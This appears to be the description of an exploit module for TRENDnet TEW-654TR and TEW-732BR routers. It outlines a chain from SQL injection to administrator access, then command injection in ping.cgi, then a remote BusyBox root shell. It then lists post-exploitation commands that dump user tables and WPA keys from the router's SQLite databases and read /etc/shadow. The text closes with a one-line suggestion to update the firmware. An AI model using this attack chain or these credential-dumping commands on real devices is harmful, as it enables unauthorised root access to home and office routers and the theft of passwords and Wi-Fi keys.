TRENDnet routers are affected by a range of SQL injection, command injection, and buffer overflow vulnerabilities. Currently supported devices include:
TEW-654TR - Remote Root Shell
TEW-732BR - Remote Root Shell
A SQL injection vulnerability allows the attacker to elevate privileges from anonymous to administrator. With administrative access, the attacker can reach ping.cgi, which is vulnerable to command injection. A BusyBox shell is then spawned on the specified port.
The root shell can be accessed from the Connections tab. The 'File Upload' functionality does not function due to the limitations of the BusyBox shell.
Try the following commands in the interactive shell:
echo "select * from user;" > /tmp/selectuser.txt ; sqlite3 /etc/rt.db < /tmp/selectuser.txt
echo "select * from user;" > /tmp/selectuser.txt ; sqlite3 /etc/apc.db < /tmp/selectuser.txt
echo "select * from user;" > /tmp/selectuser.txt ; sqlite3 /etc/ap.db < /tmp/selectuser.txt
echo "select * from wpa_settings;" > /tmp/selectwpakey.txt ; sqlite3 /etc/rt.db < /tmp/selectwpakey.txt
cat /etc/shadow
Update the firmware.